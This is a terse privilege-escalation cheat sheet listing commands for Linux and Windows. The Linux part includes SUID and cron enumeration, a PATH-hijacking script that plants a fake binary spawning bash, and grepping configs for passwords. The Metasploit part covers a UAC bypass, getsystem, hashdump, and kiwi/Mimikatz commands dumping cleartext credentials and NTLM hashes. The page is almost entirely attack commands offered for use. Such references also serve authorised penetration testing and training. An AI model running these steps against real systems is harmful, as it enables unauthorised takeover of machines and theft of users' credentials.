Privilege Escalation
Privilege Escalation
Manual Linux Privilege Escalation
# Check Current User and Groups
whoami && id && groups
# Check sudo Permissions
sudo -l
# SUID Binaries
find / -perm -4000 -type f 2>/dev/null
# Check Procesess
ps aux
# Writable Cron Jobs
cat /etc/crontab
ls -l /etc/cron.*/*
# PATH Hijacking
echo -e '#!/bin/bash\nbash -i' > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH
# Search Config Files and Credentials
find / -name "*.conf" 2>/dev/null
grep -i "pass" /etc/*.conf
# Kernel Exploit (Last Resource)
uname -a
searchsploit linux kernel <version>
Metasploit Windows Privilege Escalation
# Background meterpreter session
background
# Suggest local exploits
use post/multi/recon/local_exploit_suggester
set SESSION <ID>
run
# UAC Bypass (if user is not fully admin due to UAC)
use exploit/windows/local/bypassuac
set SESSION <ID>
run
# Attempt privilege escalation
getsystem
# Migrate to a more stable or privileged process
ps
migrate <PID>
# Dump hashes (requires SYSTEM privileges)
hashdump
# Load Mimikatz-like functionality (kiwi)
load kiwi
# Extract plaintext creds, hashes, tokens, etc.
creds_all
# View cleartext credentials from memory
kiwi_cmd sekurlsa::logonpasswords
# View NTLM hashes (if available)
kiwi_cmd sekurlsa::msv
Last updated